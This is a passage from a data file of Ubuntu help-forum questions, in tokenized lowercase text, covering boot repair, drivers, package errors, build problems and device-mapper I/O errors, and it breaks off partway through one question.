520262	dual boot : grub disappeared , boot-repair not working and linux partition can not be accessed	i 'm trying to fix a friend 's computer . he uses win7 and ubuntu 14.04 dual boot and ran `` secure boot '' , which seems to have caused major damage : afterwards , grub would n't show up and the computer booted directly to windows . we tried to reinstall grub without success . here 's what happens : i tried using boot-repair in a livesession without success ( as nothing changed ) . i paste the output below . i tried to check hard drives using gparted , but it gets stuck when searching for disks . i then tried to reinstall grub in terminal ( following this guide : http : //howtoubuntu.org/how-to-repair-restore-reinstall-grub-2-with-a-ubuntu-live-cd ) , but `` sudo mount /dev/sda3 /mnt '' would n't work as i have to specify the file format , and neither option ( ext3 , -ext4 , -auto ) seems to work finally , the attempt to save the files accessing the ext4 partition from within windows ( with ext2read and other programs ) also failed , so it seems to me the whole partition is corrupt . now here 's the output from boot-repair : http : //paste.ubuntu.com/8229032 any ideas ? thanks in advance
520263	how to specify when a daemon should stop during system shutdown ?	i have written a fuse to combine a local and remote file system as one virtual fs . the problem i am seeing is that when the system shuts down ( i.e . root issues a reboot ) , my fs dies before all the running apps ( such as firefox ) , so when the system comes back up some applications ( such as firefox ) are stuck as they were n't able to clean up because the file system disappeared before they could . i 'm running ubuntu 10.04 , which uses upstart -- how do i tell upstart to not kill my fs daemon until the users apps are all dead ?
520264	turning off auto-maximizing of windows in 14.04	i know this has been asked for other ubuntu releases , but the solutions posted are not working for me in 14.04 . i 've installed ccsm and turned off the grid option , but the windows still maximize when dragging to the top of the screen . i 've dealt with it for a while but it 's getting rather obnoxious . anyone else had this problem and come across a solution ? edit : this is happening in gnome classic , but not gnome 3
520266	key input lag on chrome browser in trusty	i just upgraded to ubuntu 14.04 and am experiencing great difficulty in typing in google chrome version 37.0.2062.94 ( 64-bit ) . typing works normally in gedit , emacs , etc but in my browser it is really slowly and often prone to typing the characters slightly out of order . it is extremely frustrating and i have n't been able to google for a solution yet . thanks !
520270	could you advise which ubuntu kernel git repo contains kernel 3.14.17 ?	could you advise which ubuntu kernel git repo contains kernel 3.14.17 ?
520272	help with realtek 8188ce	i 'm having trouble installing a driver for my wireless card . it 's a realtek 8188ce . i 'm using ubuntu 12.04 lts and i 'm running it on a compaq presario cq57 . my wlan switch does n't seem to be wanting to turn the wi-fi on . so , i 'm not actually sure if this would constitute as a hardware or software problem , but some help would be nice .
520275	problems getting canon mg2920 to work with latest 64bit desktop version of ubuntu . did my legwork !	i cant seem to get my printer to work . i followed the directions here : https : //sites.google.com/site/tipsandtricksforubuntu/printer-info/canon-drivers my printer isnt listed , so im forced to choose another ( similar ) model , or if i use the ( recommended ) generic text only driver , it doesnt print the entire page . any help would be appreciated .
520276	chrome weird shortcut	i recently ran the ubuntu updater on my computer , and it seems like it messed up my google chrome installation . every time i open google chrome , on the menu bar , instead of showing up as the normal chrome icon , it shows a slightly blurrier version , and when i put my mouse over it , it says `` digital ocean control panel '' , which was one of the tabs when the updater ran . what can i do to get rid of this ? i tried uninstalling chrome , i tried purging chrome , and i also tried deleting ~/.config/google-chrome , but still when i reopen chrome , it shows up on the menu bar as digital ocean , instead of google chrome .
520279	i cant download openjdk i have tried multiple instructions and it didnt work	i am new to ubuntu and i need help i cant download anything and i have tried all the basic download command 's and tried in the ubuntu software center anything helps , thanks .
520282	problem in launchimg topcoder arena	i have a icedtea plugin for topcoder arena . i used it till a week back . but today when i am trying to launch the arena , it is showing this error fatal : initialization error : could not initialize application . this application has not been initialized , for more information , execute javaws from the command line . anyone , please help in knowing what the problem is and how to fix it .
520286	mounting and running a multipart dmg	i downloaded a program off of my school 's server ( matlab ) and it came in 1 file that was a .dmg extension and 3 files that were a .dmgpart extension . i have looked through the forums and i ca n't find a way to recombine these and install the program . i 'm pretty new to ubuntu and would appreciate any help on how to make this work . thanks !
520287	ca n't add podcasts or network streams in vlc media player ( v 2.0.8 ) : ubuntu 12.04 lts on asus eeepc 1015x	i ca n't add podcasts ( via rss feed ) or network streams in vlc . also , this is my first post on askubuntu , and i 'm still new to linux , so please me know if i 'm not being clear or of any suggestions , they would be very welcome . system : ubuntu 12.04 lts on asus eeepc 1015x i ran $ sudo apt-get purge vlc as a first attempt to solve the problem by uninstalling ; then found some lingering vlc files using $ file $ ( ls /bin/* /usr/bin/* | grep vlc ) , but decided against manually deleting them . then , reinstalling : $ sudo apt-get update $ sudo apt-get install vlc browser-plugin-vlc $ vlc -- version vlc media player 2.0.8 twoflower ( revision 2.0.8a-0-g68cf50b ) vlc version 2.0.8 twoflower ( 2.0.8a-0-g68cf50b ) compiled by buildd on roseapple.buildd ( aug 2 2013 01:32:57 ) compiler : gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) but , after again trying to add the radiolab podcast rss feed ( url listed below in output ) by going to vlc 's playlist : internet : podcasts tab and manually pasting this url , i received : your input ca n't be opened : vlc is unable to open the mrl 'http : //feeds.wnyc.org/radiolab ' . check the log for > details . your input ca n't be opened : vlc is unable to open the mrl 'http : //feeds.wnyc.org/radiolab' check the log for details . and under tools : messages main error : vlc_object_find_name ( `` podcast '' ) is not safe ! main error : vlc_object_find_name ( `` podcast '' ) is not safe ! main error : vlc_object_find_name ( `` podcast '' ) is not safe ! access_mms error : invalid chunk fatal ( 0x3f3c ) access_mms error : header size == 0 main error : open of `http : //feeds.wnyc.org/radiolab ' failed this feed does n't work in rhythmbox either , but it does work in banshee . do i perhaps need a newer version of vlc ? i read here that vlc is only stable at 2.0.8 for ubuntu 13.10 and older , which has currently prevented me from trying this askubuntu thread . please let me know if there is any other information i can provide , thanks !
520289	toshiba sattelite c75 hotkeys not working correctly,	everyone seems to be having the same issues with toshiba laptops . everywhere i have looked , even editing the 60-keyboard.hwdb file have not worked . i also can not seem to change the brightness of the screen through ubuntu either . any help would be appreciated . i could not get the correct version of fnfxd nor could i seem to get it to work in the terminal . i just purchased the laptop today , 9/4/14 , i wonder if they will take it back if i installed ubuntu ... ..no point in having a shite laptop with non functioning keys .
520290	system program problem detected on ubuntu 14.04	i got this message on my taskbar an error occured , please run package manager from the right-click menu or apt-get in a terminal to see what is wrong . the error message was : 'uknown error : '' ( e : type'1 ' is not known on line 1 in source list/etc/apt/sources.list , e : type '6587\x5b8b\xf53 ' is not know on line 1 in source list/etc/apt/sources.list.d/webupd8team-java-trusty. ( list ) ' . this usually means that your installed packages have unmet dependencies
520292	adobe flash player not detected on chromium for ubuntu	i am using chromium for ubuntu and it 's telling me i need to install adobe flash player ( afp ) when i go to play a certain video by directing me to adobe 's website . i have afp installed via ubuntu software center , however that seems to be not good enough . how can i get it working ? i have done some research before posting this and i 'm being told ( from adobe 's website ) to download the tar ball , extract , then cp the files into certain directories , namely libflashplayer.so into chromium 's `` browser plug-in directory '' and a /usr folder into `` the flash player local settings configuration . '' i presume this process will work given that it 's in adobe 's readme file ; i have a few questions about the instructions . how do i find the browser plugin in directory , generally speaking ; i 'd like an answer that applies to any os as well as browser if possible . if there is a better way to go about solving this problem , please address it .
520293	ubuntu touch : kill windows manager and start xterm in gui mode	i installed xterm and i would want it to be the only gui application running . so i killed the lighdm using : sudo service lighdm stop . and try to run xterm using : sudo xterm through a ssh terminal , but i ca n't run xterm because it says display not set up error . where is xinit/startx in ubuntu touch 14.10 ?
520295	need help setting up virtual surround sound on logitech g430	i 've googled and googled , looked through tons of results , but i ca n't seem to get anything to work . i 've looked into everything i can find , looked into pulseaudio along with alsa , and even oss ( but i ca n't find much on it , however i think that it might be the better way to go ) . i really do n't know where to go here , but i really want virtual 7.1 audio like i had on winderp $ . logitech has their own gaming software on winderp $ that does this excellently , but for obvious reasons this is n't helping my issue . i doubt wine would help , but if it would someone let me know . i really want a fix to this , and as long as it can be done , i 'll do whatever it takes . thank you for your time and answers . also , i do not believe this is a standard sterio device , as it 's still only using my front speakers on linux , and whenever i do not have the logitech software installed on winderp $ . if it 's only using my front two speakers ( or at least front channels ) , then my device must have been made in a way to where it 's borderline actually 7.1 and not entirely virtual . also , running speaker-test -c 8 uses all channels properly in the proper positions except for lfe . i had to do a little configuring to get it to do this , but everything still thinks this is just a sterio device . i think this is proof enough that my request is possible . even if it was just virtual , i still want a way to fix it and get 7.1 back . this is the result of lsusb -v : bus 003 device 002 : id 046d:0a4d logitech , inc. could n't open device , some information will be missing device descriptor : blength 18 bdescriptortype 1 bcdusb 1.10 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 16 idvendor 0x046d logitech , inc. idproduct 0x0a4d bcddevice 1.19 imanufacturer 1 iproduct 2 iserial 0 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 253 bnuminterfaces 4 bconfigurationvalue 1 iconfiguration 0 bmattributes 0x80 ( bus powered ) maxpower 100ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 0 binterfaceclass 1 audio binterfacesubclass 1 control device binterfaceprotocol 0 iinterface 0 audiocontrol interface descriptor : blength 10 bdescriptortype 36 bdescriptorsubtype 1 ( header ) bcdadc 1.00 wtotallength 100 bincollection 2 bainterfacenr ( 0 ) 1 bainterfacenr ( 1 ) 2 audiocontrol interface descriptor : blength 12 bdescriptortype 36 bdescriptorsubtype 2 ( input_terminal ) bterminalid 13 wterminaltype 0x0201 microphone bassocterminal 0 bnrchannels 1 wchannelconfig 0x0003 left front ( l ) right front ( r ) ichannelnames 0 iterminal 0 audiocontrol interface descriptor : blength 9 bdescriptortype 36 bdescriptorsubtype 6 ( feature_unit ) bunitid 6 bsourceid 13 bcontrolsize 1 bmacontrols ( 0 ) 0x01 mute control bmacontrols ( 1 ) 0x02 volume control ifeature 0 audiocontrol interface descriptor : blength 12 bdescriptortype 36 bdescriptorsubtype 2 ( input_terminal ) bterminalid 12 wterminaltype 0x0101 usb streaming bassocterminal 0 bnrchannels 2 wchannelconfig 0x0003 left front ( l ) right front ( r ) ichannelnames 0 iterminal 0 audiocontrol interface descriptor : blength 13 bdescriptortype 36 bdescriptorsubtype 4 ( mixer_unit ) bunitid 9 bnrinpins 2 basourceid ( 0 ) 12 basourceid ( 1 ) 6 bnrchannels 2 wchannelconfig 0x0003 left front ( l ) right front ( r ) ichannelnames 0 bmcontrols 0x00 imixer 0 audiocontrol interface descriptor : blength 10 bdescriptortype 36 bdescriptorsubtype 6 ( feature_unit ) bunitid 1 bsourceid 9 bcontrolsize 1 bmacontrols ( 0 ) 0x01 mute control bmacontrols ( 1 ) 0x02 volume control bmacontrols ( 2 ) 0x02 volume control ifeature 0 audiocontrol interface descriptor : blength 9 bdescriptortype 36 bdescriptorsubtype 3 ( output_terminal ) bterminalid 14 wterminaltype 0x0301 speaker bassocterminal 0 bsourceid 1 iterminal 0 audiocontrol interface descriptor : blength 9 bdescriptortype 36 bdescriptorsubtype 6 ( feature_unit ) bunitid 2 bsourceid 13 bcontrolsize 1 bmacontrols ( 0 ) 0x01 mute control bmacontrols ( 1 ) 0x02 volume control ifeature 0 audiocontrol interface descriptor : blength 7 bdescriptortype 36 bdescriptorsubtype 5 ( selector_unit ) bunitid 8 bnrinpins 1 basource ( 0 ) 2 iselector 0 audiocontrol interface descriptor : blength 9 bdescriptortype 36 bdescriptorsubtype 3 ( output_terminal ) bterminalid 10 wterminaltype 0x0101 usb streaming bassocterminal 0 bsourceid 8 iterminal 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 0 bnumendpoints 0 binterfaceclass 1 audio binterfacesubclass 2 streaming binterfaceprotocol 0 iinterface 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 1 bnumendpoints 1 binterfaceclass 1 audio binterfacesubclass 2 streaming binterfaceprotocol 0 iinterface 0 audiostreaming interface descriptor : blength 7 bdescriptortype 36 bdescriptorsubtype 1 ( as_general ) bterminallink 12 bdelay 1 frames wformattag 1 pcm audiostreaming interface descriptor : blength 14 bdescriptortype 36 bdescriptorsubtype 2 ( format_type ) bformattype 1 ( format_type_i ) bnrchannels 2 bsubframesize 2 bbitresolution 16 bsamfreqtype 0 continuous tlowersamfreq 8000 tuppersamfreq 48000 endpoint descriptor : blength 9 bdescriptortype 5 bendpointaddress 0x01 ep 1 out bmattributes 13 transfer type isochronous synch type synchronous usage type data wmaxpacketsize 0x00c0 1x 192 bytes binterval 1 brefresh 0 bsynchaddress 0 audiocontrol endpoint descriptor : blength 7 bdescriptortype 37 bdescriptorsubtype 1 ( ep_general ) bmattributes 0x01 sampling frequency blockdelayunits 0 undefined wlockdelay 0 undefined interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 2 balternatesetting 0 bnumendpoints 0 binterfaceclass 1 audio binterfacesubclass 2 streaming binterfaceprotocol 0 iinterface 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 2 balternatesetting 1 bnumendpoints 1 binterfaceclass 1 audio binterfacesubclass 2 streaming binterfaceprotocol 0 iinterface 0 audiostreaming interface descriptor : blength 7 bdescriptortype 36 bdescriptorsubtype 1 ( as_general ) bterminallink 10 bdelay 1 frames wformattag 1 pcm audiostreaming interface descriptor : blength 14 bdescriptortype 36 bdescriptorsubtype 2 ( format_type ) bformattype 1 ( format_type_i ) bnrchannels 1 bsubframesize 2 bbitresolution 16 bsamfreqtype 0 continuous tlowersamfreq 8000 tuppersamfreq 48000 endpoint descriptor : blength 9 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 5 transfer type isochronous synch type asynchronous usage type data wmaxpacketsize 0x0062 1x 98 bytes binterval 1 brefresh 0 bsynchaddress 0 audiocontrol endpoint descriptor : blength 7 bdescriptortype 37 bdescriptorsubtype 1 ( ep_general ) bmattributes 0x01 sampling frequency blockdelayunits 0 undefined wlockdelay 0 undefined interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 3 balternatesetting 0 bnumendpoints 1 binterfaceclass 3 human interface device binterfacesubclass 0 no subclass binterfaceprotocol 0 none iinterface 0 hid device descriptor : blength 9 bdescriptortype 33 bcdhid 1.00 bcountrycode 0 not supported bnumdescriptors 1 bdescriptortype 34 report wdescriptorlength 43 report descriptors : ** unavailable ** endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x87 ep 7 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0005 1x 5 bytes binterval 1
520296	ubuntu 12.04 : pam_motd sometimes displays only partial motd	this is n't a very big deal but it really irritates me somehow . we have a large number of machines running ubuntu 12.04 ( server/amd64 ) which i frequently ssh into . we have the standard set-up for this version of ubuntu , where there are a handful of scripts in /etc/update-motd.d that are used to build the motd , and /etc/pam.d/sshd is configured to print the motd on ssh log-in via pam_motd.so . our motd scripts are all custom ( we do n't have any of the built-in ubuntu ones on these machines ) , but everything else is absolutely stock ubuntu server config . for the most part , this works fine . however , once in a while , the motd is displayed only partially ( or sometimes not at all ) . there is no error message either at the terminal or in any logs that i can find , it just does n't display the complete output . if i cat /var/run/motd immediately after this occurs , that file does show the full ( and up-to-date ) output , though . i know that run-parts has an option to stop processing scripts if one of them exits with a > 0 status , but i do n't think that 's applicable in this case — often the output is truncated in the middle of the script execution . for example , one script might print out some lines like this : mycompany header hostname uname cpu ram uptime but the motd will stop immediately after mycompany header . these are very simple bash scripts and we do not have the -e option enabled in them , so i do n't know how this can even happen . at first i thought that maybe there was a limit on the amount of time that pam would wait for the motd to be generated , and that maybe sometimes ( depending on load or whatever ) we might be hitting that limit — but that does n't seem to be the case . the motd is printed almost immediately every time , whether it 's truncated or not . the only other thing i can think of is that maybe run-parts is writing the dynamic motd file out one line at a time , and there is some kind of race condition where pam_motd is reading an incomplete version of that file . however , i ca n't confirm that , because i have no idea what the mechanism is behind this functionality . my understanding is that pam somehow fires off run-parts to update the file on log-in , but i ca n't find any references to run-parts or /etc/update-motd.d in the pam source . all the pam_motd code seems to do is just read in the motd file . the only possibly useful clue i could find is this : if i do watch -n 0.1 'ps aux | grep `` run-parts '' ' in one terminal window , as i disconnect and re-connect to the same host in another window , i can see that , when the output is complete , there are always several processes that appear very briefly in the process list — but when it 's truncated , there are only one or two processes ( sometimes none at all ) . edit : i should also add that i ca n't replicate this problem at all when i execute run-parts -- lsbsysinit /etc/update-motd.d manually ; it only seems to happen at ssh log-in . how can i troubleshoot this further ? how does pam instruct the system to update the motd ? does it wait for that process to finish , or does it run concurrently ? is there a way to change that behaviour ? is there a debug option i can set somewhere to at least see what 's happening ? is there any expected reason that run-parts might abort in the middle of a script ? cheers
520298	what happens when a program is installed ?	i am posting this question with the intention of getting a comprehensive answer that explains the installation process . some particular questions i have about the process : what 's the difference between the bin folder in the root directory and the bin folder in the usr directory ? what needs to happen for a program to be recognized by the terminal so i can type the name of the program with options and arguments ? are there any other standard directories that may be created upon the install of a program ? where are they located ?
520299	black screen after log-in in linux mint 17 cinnamon qiana	installed linux mint 17 cinnamon qiana on my toshiba satellite m55 . every once in a while i get a black screen after i log-in and i all see is the mouse pointer . i checked and double checked the driver manager but all i get is for the modem , nothing else . can you please help ?
520302	how to upgrade a repository package from source without also upgrading its dependencies ?	i tried to upgrade python3-sip from 4.15.5 ( latest version in ubuntu 14.04 repository ) to 4.16.2 ( latest version from source ) . however , the version being imported in python3 is still the old version : $ python3 > > > import sip > > > sip.sip_version_str '4.15.5' what i did so far : i decided against uninstalling the python3-sip package because the python3-pyqt5 package and related pyqt packages depend on it , and i do not want to have to reinstall all of those packages from source . i used the following commands to install the latest sip 4.16.2 from source : $ cd /tmp/sip $ wget http : //sourceforge.net/projects/pyqt/files/sip/sip-4.16.2/sip-4.16.2.tar.gz $ aunpack sip-4.16.2.tar.gz $ cd sip-4.16.2/ $ python3 configure.py $ make $ sudo make install additional information : the output of the make install command was : make [ 1 ] : entering directory `/tmp/sip/sip-4.16.2/sipgen' cp -f sip /usr/bin/sip make [ 1 ] : leaving directory `/tmp/sip/sip-4.16.2/sipgen' make [ 1 ] : entering directory `/tmp/sip/sip-4.16.2/siplib' cp -f sip.so /usr/lib/python3/dist-packages/sip.so strip /usr/lib/python3/dist-packages/sip.so cp -f /tmp/sip/sip-4.16.2/siplib/sip.h /usr/include/python3.4m/sip.h make [ 1 ] : leaving directory `/tmp/sip/sip-4.16.2/siplib' cp -f sipconfig.py /usr/lib/python3/dist-packages/sipconfig.py cp -f /tmp/sip/sip-4.16.2/sipdistutils.py /usr/lib/python3/dist-packages/sipdistutils.py the output of locate sip | grep python3 after updatedb : /usr/include/python3.4m/sip.h /usr/lib/python3/dist-packages/sip.cpython-34m-x86_64-linux-gnu.so /usr/lib/python3/dist-packages/sip.so /usr/lib/python3/dist-packages/sipconfig.py /usr/lib/python3/dist-packages/sipconfig_nd4.py /usr/lib/python3/dist-packages/sipdistutils.py /usr/lib/python3/dist-packages/__pycache__/sipconfig.cpython-34.pyc /usr/lib/python3/dist-packages/__pycache__/sipconfig_nd4.cpython-34.pyc /usr/share/doc/python3-sip /usr/share/doc/python3-sip/changelog.debian.gz /usr/share/doc/python3-sip/copyright /usr/share/python3/dist/python3-sip /var/lib/dpkg/info/python3-sip.list /var/lib/dpkg/info/python3-sip.md5sums /var/lib/dpkg/info/python3-sip.postinst /var/lib/dpkg/info/python3-sip.prerm
520303	internet access blocked on unsecure wifi	i am using a pc that was natively a windows vista pc . i switched to ubuntu less than a month ago so i am still getting used to the extreme differences b/w linux+windows . my computer works fine at my house , which uses a secure wpa & wpa2 key . however , when i try to get onto the internet at my high school , where an unsecured wifi network is available but it uses a slightly more secured web sign-in using a student account # through a network named [ district ] byod . any help would be much appreciated . by the way the network at my school uses some system with the name meraki . i learned that is made by cisco , could that be the issue ?
520305	failed to install the extension pack	failed to install the extension pack `/home/ulot/downloads/oracle_vm_virtualbox_extension_pack-4.3.14-95030.vbox-extpack.` the installer failed with exit code 127 : pkexec must be setuid root . result code : ns_error_failure ( 0x80004005 ) component : extpackmanager interface : iextpackmanager { 3295e6ce-b051-47b2-9514-2c588bfe7554 } please advice anyone . thanks
520306	change scrren resolution when vnc client connected automatically	when i am outside using a notebook with smaller monitor , connecting to vino vnc server at home the resolution is 1920x1080 . it 's not convenient to control . how can it change resolution automatically when i connected ? say , do xrandr -s 3 when i connected , and do xrandr -s 0 after disconnected ? although some vnc server have resolution argument to specify . but i want to always use display :0.0 without need to fork another display .
520307	digital clock shows chinese characters	i am in lubuntu 14.04 my digital clock is showing the day and date in chinese characters . i was in japan and am now in malaysia . the time is correct . how can i get them to change back into english ?
520308	protect your apache server	i am a developer sites , i have an apache server i want to be private and not open to me on the internet to protect how do i do
520309	i am not able to find the md5sum for ubuntu 14.04.1 iso image	i have just downloaded the new release of ubuntu which is ubuntu 14.04.1. but i am unable to find the md5sum for this . the ubuntu website show me the md5sums of ubuntu 14.04 and more previous versions . so how to find the md5sum for ubuntu 14.04.1-desktop-i386.iso ?
520312	is there a way i can have half my hard drive partitioned to ntfs ?	i am currently running ubuntu off of one hard drive ( i currently only have one in my computer at the moment ) tried to install windows via a boot disk . i get to the setup and it asks where to install windows , but i ca n't click on any of the hard drives because they are not in ntfs format . i was wondering if i can format half of my hard drive to ntfs so i can install windows on here aswell ( dual boot ) . please help me . : (
520316	/usr/bin/ld : skipping incompatible .//libasmlibrary.so when searching for -lasmlibrary	i am using ubuntu 12.04 . i am trying to build asmlibrary from this link https : //github.com/greatyao/asmlibrary on my system . opencv2.4.9 is installed on my system . i am trying to run make command and after that i am getting the error **/usr/bin/ld : skipping incompatible .//libasmlibrary.so when searching for -lasmlibrary on terminal.can anybody please help me with this i am totally new to linux . thanks ... .
520317	what are the hashes for the various flavours of ubuntu ?	the hashes posted on ubuntu hashes do not mention 14.04.1 . where and what are the hashes for the 14.04.1 images ?
520320	installing ubuntu alongside windows , os not detecting ?	i have just formatted my hp envy laptop with windows 8.1 and i tried to install ubuntu but failed as it is not detecting os so that it can be installed alongside . i have tried all your support of legacy mode and secure boot on off option but it did not work , i need ubuntu plzz help , what to do ? ?
520328	running cli/terminal programs as entirely separate program ( i.e not as an instance of urxvt with -e toggle ? )	i 'm currently running openbox as wm , with urxvt as terminal emulator , and zsh as shell . i use mutt for emailing , ranger for files , cortex for redditing , newsbeuter for rssing . all of these programs are keybound to run from urxvt with the -e toggle , here 's an example from my /openbox/rc.xml of how i start ncmpcpp : < keybind key= '' w-f5 '' > < action name= '' execute '' > < command > urxvt -name ncmpcpp -e ncmpcpp -h 192.168.x.x -p 1337 < /command > < /action > all the other programs are pretty much started the same way . i end up with something like this : i.e , all of these terminal programs end up under urxvt . i would like to be able to have separate icons for all of the above programs , i also want them to be on their own when alt-tabbing . i have tried making a ncmpcpp.desktop file which contains the following : [ desktop entry ] type=application name=ncmpcpp genericname=ncurses music player client exec=ncmpcpp -h 192.168.1.x -p 1337 terminal=true categories=audiovideo ; audio ; player ; consoleonly ; icon=/home/joel/ncmpccp.png to no avail . ncmpccp is still lumped together with urxvt both in plank and in the alt-tab menu . ofcourse it is run from urxvt , but should n't it be possible to run it independently ? appreciate any help at all .
520330	ubuntu server performance very slow while connecting with vnc viewer	we have ibm x31000 server and using ubuntu 14.04 amd64 os . the server performance going very slow while connecting with vnc viewer or other remote desktop application . please help us how to resolve the problem
520331	ubuntu window disappear after gnome installed	im currently using 14.04 , recently installed gnome desktop but now gui is crashing every time . can not do anything in gui with the keyboard ! can anybody help me to correct this issue ?
520333	sudo apt get update and gives error gpg	when i write sudo apt-get update in terminal i give this error ( ubuntu 14.4 ) fetched 177 kb in 1min 27s ( 2,031 b/s ) w : gpg error : http : //ppa.launchpad.net trusty release : the following signatures could n't be verified because the public key is not available : no_pubkey 4874d3686e80c6b7 w : gpg error : http : //ppa.launchpad.net trusty release : the following signatures could n't be verified because the public key is not available : no_pubkey a1715d88e1df1f24 w : failed to fetch http : //ppa.launchpad.net/pcf/miro-releases/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/pcf/miro-releases/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . how can fix it ? ?
520334	windows 7 detected , but no option to install alongside windows	situtation i want to install ubuntu alongside windows 7 . i have 3 partitions on my internal hard-disk ( c , d , e ) and one external hard disk drive . i have removed external hard disk drive ( from usb port ) as i do not want to mess-up with my data on the this drive . i formated ( as ntfs ) my drive d in windows 7 to install ubuntu on this drive . created a bootable usb with ubuntu 14.04.1 problem installation is showing windows 7 detected but no option to install alongside windows . updated output of sudo parted -l http : //pastebin.ubuntu.com/8257304/
520336	disable unnecessary startup services and applications	what is the best practices to disable unnecessary startup services and applications ? this post is very useful when i came to decide what to disable which startup applications can i safely disable ? , but i can not find how to start ! also i can not find anything related to services .
520338	bluez problem in ubuntu 14.04	i am replacing old bluetoothd with new bluetoothd by compiling bluez 5.22 , that time gui mode for bluetooth connection is not working . what is reason , any one give the solution for this please .
520339	( qml ) what does the `` ? '' do in defining properties ?	popey { working : visible ? 100 } what does that `` ? '' indicate in this example ?
520340	how do i run .ui files in ubuntu 12.04 ?	i created a very basic .ui file and edited it using pyqt . now when i click the ui file , it opens in qt designer . how do i run it ? all it does in print ham ( hehe ) . i 'm sorry about my language , please edit this question if needed .
520345	why does ubuntu url include amd when i choose 64bit and not amd64bit ?	first , i have intel processors and a pc workstation . i `` choose my flavor '' of `` 64bit '' and get the following iso possibility with the url having `` & version=14.04.1 & architecture=amd64 '' : '' ubuntu-14.04.1-desktop-amd64.iso '' if i choose amd64 , i get the following iso possibility with url having & version=14.04.1 & architecture=amd64+mac : ubuntu-14.04.1-desktop-amd64+mac.iso as mentioned , i have intel and pc and not amd or mac on the workstation i want to download onto .
520346	qt deployment on remote genric linux device error	facing issue while deploying qt project on bbb. '' stdin : is not a tty /home/debian/test2 : error while loading shared libraries : libqtgui.so.4 : can not open shared object file : no such file or directory application finished with exit code 127 `` so i tried above mentioned cmd `` sudo apt-get install libqtgui4 : i386 '' but my terminal says : libqtgui4 is already the newest version . libqtgui4 set to manually installed . issue remains the same ... please revert what to do host machine is : ununtu 14.04 target is : debien running bbb
520352	resuming apt-mirror fails due to corrupt index files	i have problems to get apt-mirror to resume after is has been terminated abrupt ( my vpn connection was terminated ) . i get an error that indicates that some apt-mirror files are corrupt . maybe the index files ? i have tried to remove all the downloaded files , but that does not work . the error output look like this : $ sudo apt-mirror downloading 24 index files using 5 threads ... begin time : fri sep 5 09:36:09 2014 [ 5 ] ... [ 4 ] ... [ 3 ] ... [ 2 ] ... [ 1 ] ... [ 0 ] ... end time : fri sep 5 09:36:09 2014 proceed indexes : [ p gzip : stdin : not in gzip format p gzip : stdin : not in gzip format p gzip : stdin : not in gzip format p gzip : stdin : not in gzip format ] 0.0 bytes will be downloaded into archive . downloading 0 archive files using 0 threads ... i have found a few answers on the net , but none of them helps . i would like to know where these gzip files are stored . then it should be possible to remove them and the restart the apt-mirror stuff .
520354	why is n't one 'bash ' command working at startup	i am working on a vm with lubuntu 14.04 , i have created a script a.sh , # ! bin/bash echo `` aaaa '' > > a.txt and my /etc/rc.local file is as follows : # ! /bin/sh -e # # rc.local # # this script is executed at the end of each multiuser runlevel . # make sure that the script will `` exit 0 '' on success or any other # value on error . # # in order to enable or disable this script just change the execution # bits . # # by default this script does nothing . bash /home/sentinel/a.sh echo `` hey '' > > /home/sentinel/b.txt exit 0 on rebooting my machine , i can see b.txt built with content as hey but a.txt is not being built . can somebody please help me here ?
520356	installing matlab on ubuntu , on mounted partition	i recently successed installing matlab on my primary partition but due to the programs size i decided to move it to a second partition . in the installation guide i decided to install matlab to /media/myuser/ [ a lot of numbers ] /ubuntu/matlab which is a folder on my ntfs windows 8.1 partition . the installer succeeded but i can not start matlab the way i did before , by just typing 'matlab ' in the terminal . i also tried to start it by go to the installation path /bin and then run ./matlab but i just get `` access denied '' . i tried with sudo , which did not helped , i also tried chmod the starter file with chmod +x matlab , with no further success . what is wrong ?
520358	logical block number in the `` buffer i/o error ''	i was trying to determine a bad pv which was causing the lv to report buffer i/o error and found this interesting behaviour in the `` buffer i/o error '' message . on a large lv that is mapped to different pvs , i tried to use the `` logical block '' reported in the error , to match with the dmsetup table to find out which target device it was on . however this method does n't seem to be reliable . i used dmsetup to create a device mapper device , with one or a number of holes in it . and the error messages are very interesting and i ca n't make sense of the pattern . it seems the `` logical block '' number in the error message depends on the size of the hole and also it 's position . is there a definitive way to locate the actual bad block ? here are the tests that i did +++ test 1 error block at 8 , buffer i/o error at lb 8 root @ ubuntu : ~ # dmsetup create test x.tab root @ ubuntu : ~ # dmsetup table test 0 8 linear 8:16 0 8 1 error 9 1000 linear 8:16 8 root @ ubuntu : ~ # dd if=/dev/mapper/test of=/dev/null bs=512 count=1000 dd : error reading ‘/dev/mapper/test’ : input/output error 8+0 records in 8+0 records out 4096 bytes ( 4.1 kb ) copied , 0.000977434 s , 4.2 mb/s root @ ubuntu : ~ # sep 5 17:21:07 ubuntu kernel : [ 1358.811671 ] bio : create slab < bio-1 > at 1 sep 5 17:21:07 ubuntu kernel : [ 1358.817045 ] buffer i/o error on device dm-0 , logical block 8 sep 5 17:21:07 ubuntu kernel : [ 1358.817192 ] buffer i/o error on device dm-0 , logical block 8 sep 5 17:21:07 ubuntu kernel : [ 1358.817199 ] buffer i/o error on device dm-0 , logical block 8 sep 5 17:21:07 ubuntu kernel : [ 1358.817201 ] buffer i/o error on device dm-0 , logical block 8 sep 5 17:21:07 ubuntu kernel : [ 1358.817203 ] buffer i/o error on device dm-0 , logical block 8 sep 5 17:21:07 ubuntu kernel : [ 1358.817629 ] buffer i/o error on device dm-0 , logical block 8 sep 5 17:21:07 ubuntu kernel : [ 1358.817633 ] buffer i/o error on device dm-0 , logical block 8 sep 5 17:21:07 ubuntu kernel : [ 1358.818649 ] buffer i/o error on device dm-0 , logical block 8 sep 5 17:21:19 ubuntu kernel : [ 1370.324905 